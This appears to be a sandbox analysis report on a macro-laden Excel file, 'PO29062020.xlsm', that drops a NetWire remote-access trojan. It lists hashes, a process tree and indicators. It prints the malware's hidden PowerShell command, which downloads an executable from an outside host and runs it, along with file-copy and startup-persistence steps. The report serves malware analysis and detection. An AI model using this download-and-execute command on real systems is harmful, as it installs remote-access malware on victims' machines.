Analysis
-
max time kernel
151s -
max time network
83s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
29-06-2020 19:51
Static task
static1
Behavioral task
behavioral1
Sample
PO29062020.xlsm
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
General
-
Target
PO29062020.xlsm
-
Size
407KB
-
MD5
2958c347433029ff3d06f2e3f32a735b
-
SHA1
b729fbe5d5642ca5987db47352b134797852d097
-
SHA256
d70d7499eec43adaa9d908f4df45fbb064a53e488f765ec5a5cb99baf1285389
-
SHA512
0ff681ca3254a6ae552b91a9017aa660725e148c35adaebc830f7f37778d8a1f05fe64681fbc9732a7e6c6992c325f2c7c14eac20f813e78a15de8f28bba28d6
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://longi.ca/wdfr.exe
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 1612 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
putty.exewhdhost.exepid process 1812 putty.exe 1852 whdhost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
putty.exedescription pid process target process PID 1812 set thread context of 1852 1812 putty.exe whdhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeputty.exedescription pid process Token: SeDebugPrivilege 1612 powershell.exe Token: SeDebugPrivilege 1812 putty.exe -
Loads dropped DLL 1 IoCs
Processes:
putty.exepid process 1812 putty.exe -
Drops startup file 1 IoCs
Processes:
putty.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.exe.lnk putty.exe -
NTFS ADS 1 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Local\Temp\FolderN\name.exe:Zone.Identifier cmd.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeputty.exepid process 1612 powershell.exe 1812 putty.exe 1812 putty.exe -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid process 1356 EXCEL.EXE 1356 EXCEL.EXE 1356 EXCEL.EXE 1356 EXCEL.EXE 1356 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1612 1356 powershell.exe EXCEL.EXE -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
EXCEL.EXEpowershell.exeputty.exedescription pid process target process PID 1356 wrote to memory of 1612 1356 EXCEL.EXE powershell.exe PID 1356 wrote to memory of 1612 1356 EXCEL.EXE powershell.exe PID 1356 wrote to memory of 1612 1356 EXCEL.EXE powershell.exe PID 1612 wrote to memory of 1812 1612 powershell.exe putty.exe PID 1612 wrote to memory of 1812 1612 powershell.exe putty.exe PID 1612 wrote to memory of 1812 1612 powershell.exe putty.exe PID 1612 wrote to memory of 1812 1612 powershell.exe putty.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1852 1812 putty.exe whdhost.exe PID 1812 wrote to memory of 1176 1812 putty.exe cmd.exe PID 1812 wrote to memory of 1176 1812 putty.exe cmd.exe PID 1812 wrote to memory of 1176 1812 putty.exe cmd.exe PID 1812 wrote to memory of 1176 1812 putty.exe cmd.exe PID 1812 wrote to memory of 1636 1812 putty.exe cmd.exe PID 1812 wrote to memory of 1636 1812 putty.exe cmd.exe PID 1812 wrote to memory of 1636 1812 putty.exe cmd.exe PID 1812 wrote to memory of 1636 1812 putty.exe cmd.exe -
NetWire RAT payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1852-9-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral1/memory/1852-12-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1356 EXCEL.EXE
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO29062020.xlsm1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://longi.ca/wdfr.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')2⤵
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\putty.exe"C:\Users\Admin\AppData\Local\Temp\putty.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Loads dropped DLL
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\whdhost.exe"C:\Users\Admin\AppData\Local\Temp\whdhost.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy "C:/Users/Admin/AppData/Local/Temp/putty.exe" "%temp%\FolderN\name.exe" /Y4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo [zoneTransfer]ZoneID = 2 > %temp%\FolderN\name.exe:Zone.Identifier4⤵
- NTFS ADS
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\putty.exe
-
C:\Users\Admin\AppData\Local\Temp\putty.exe
-
C:\Users\Admin\AppData\Local\Temp\whdhost.exe
-
\Users\Admin\AppData\Local\Temp\whdhost.exe
-
memory/1176-13-0x0000000000000000-mapping.dmp
-
memory/1356-2-0x0000000005E80000-0x0000000005F80000-memory.dmpFilesize
1024KB
-
memory/1356-3-0x0000000005E80000-0x0000000005F80000-memory.dmpFilesize
1024KB
-
memory/1356-1-0x0000000005E80000-0x0000000005F80000-memory.dmpFilesize
1024KB
-
memory/1612-4-0x0000000000000000-mapping.dmp
-
memory/1636-14-0x0000000000000000-mapping.dmp
-
memory/1812-5-0x0000000000000000-mapping.dmp
-
memory/1852-10-0x000000000040242D-mapping.dmp
-
memory/1852-9-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/1852-12-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB